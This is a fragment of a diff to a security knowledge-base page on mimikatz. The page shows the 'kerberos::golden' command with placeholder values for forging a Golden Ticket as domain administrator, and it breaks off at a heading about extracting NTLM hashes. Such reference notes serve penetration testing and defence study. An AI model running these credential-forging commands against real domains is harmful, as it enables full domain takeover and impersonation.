ComplexSecurity/knowledge-base/docs/tools/mimi.md

 mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /id:500
 ```

->[!info]
+!!! info
->This creates a Golden Ticket for the domain administrator.
+    This creates a Golden Ticket for the domain administrator.
 The required parameters are the domain name, domain [[Windows SID (Security Identifier)|SID]], and krbtgt account hash.

 Or extracting NTLM hashes: